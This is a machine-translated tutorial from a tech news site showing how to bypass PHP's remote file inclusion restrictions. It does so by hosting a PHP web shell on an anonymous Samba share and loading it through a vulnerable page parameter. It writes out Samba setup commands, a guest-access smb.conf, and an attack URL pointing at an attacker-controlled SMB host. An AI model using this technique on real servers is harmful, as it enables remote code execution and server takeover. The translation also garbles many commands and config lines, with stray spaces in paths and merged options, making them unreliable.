Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use SMB sharing to bypass the restrictions contained in php remote files. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

PHP and SMB shared file access

In the PHP configuration file, the "allow_url_include" wrapper is set to "Off" by default, indicating that PHP does not load remote HTTP or FTP URL, thus preventing remote files from containing attacks. However, even if both "allow_url_include" and "allow_url_fopen" are set to "Off", PHP does not prevent SMB URL from loading. This is most likely to be abused to load remotely hosted PHP Web shell from a SMB share.

Overview of attack scenarios

When vulnerable PHP application code attempts to load PHP Web shell from an attacker-controlled SMB share, the SMB share should allow access to the file. An attacker needs to configure a SMB server with anonymous browsing access on it. Therefore, once a vulnerable application attempts to access the PHP Web shell,SMB server from a SMB share, no credentials will be required, and the vulnerable application will contain the PHP code of Web shell.

First, I reconfigured the PHP environment and disabled "allow-url-fopen" and "allow-url-include" in the php.in I file. After that, a SMB server with anonymous browsing access is configured. Once SMB sharing is ready, we can take advantage of vulnerable applications.

PHP environment settings

Set "allow_url_fopen" and "allow_url_include" on the machine hosting vulnerable code to "Off"

The following is a screenshot of the current PHP configuration with version "5.5.11":

Before moving on, let's make sure that when we try to access the Web shell hosted on HTTP, the PHP code does not allow remote files to be included.

As you can see, when I tried to include PHP Web shell from a remote host, the application threw an error and did not include the remote file.

Configure a Samba server (Linux machine) with anonymous browsing access

Install the Samba server using the following command:

Apt-get install samba

Create a SMB shared directory:

Mkdir / var/www/html/pub/

Configure permissions for the newly created SMB share directory:

Chmod 0555 / var/www/html/pub/chown-R nobody:nogroup / var/www/html/pub/

Run the following command to remove the default contents of the SAMBA server profile.

Echo > / etc/samba/smb.conf

Add the following to the / etc/samba/smb.conf file.

[global] workgroup = WORKGROUPserver string = Samba Server% vnetbios name = indishell-labsecurity = usermap to guest = bad username resolve order = bcast hostdns proxy = nobind interfaces only = yes [ica] path = / var/www/html/pubwritable = noguest ok = yesguest only = yesread only = yesdirectory mode = 0555force user = nobody

Now restart the SAMBA server for the new configuration in the configuration file / etc/samba/smb.conf to take effect.

Service smbd restart

After successfully restarting the SAMBA server, try to access the SMB share and ensure that the SAMBA server does not require credentials.

In this example, the SAMBA server IP is 192.168.0.3, and I need to access the SMB share in the Windows file browser, as follows:

\\ 192.168.0.3\ host PHP Web shell on a SMB share

great! Can access the smb share and show that the directory "ica" exists.

Now, host PHP shell in the directory "/ var/www/html/pub", which is the smb shared directory "ica".

After successfully hosting PHP shell, we use the Windows file browser to access the SMB shared directory "ica".

\\ 192.168.0.3\ ica\

You can see that php shell exists in the smb shared directory, which in this case is the box.php file.

Use files to contain vulnerable parameters

Let's browse it using this PHP shell SMB link, as well as vulnerable php code.

Http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php

The PHP vulnerable code obtains the web shell from the SMB share and executes the code\ m / on the application server. We have bypassed the restrictions contained in php remote files and include Web shell hosted on remote hosts.

So much for sharing on how to use SMB sharing to bypass the restrictions contained in php remote files. I hope the above content can be of some help to you and learn more. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.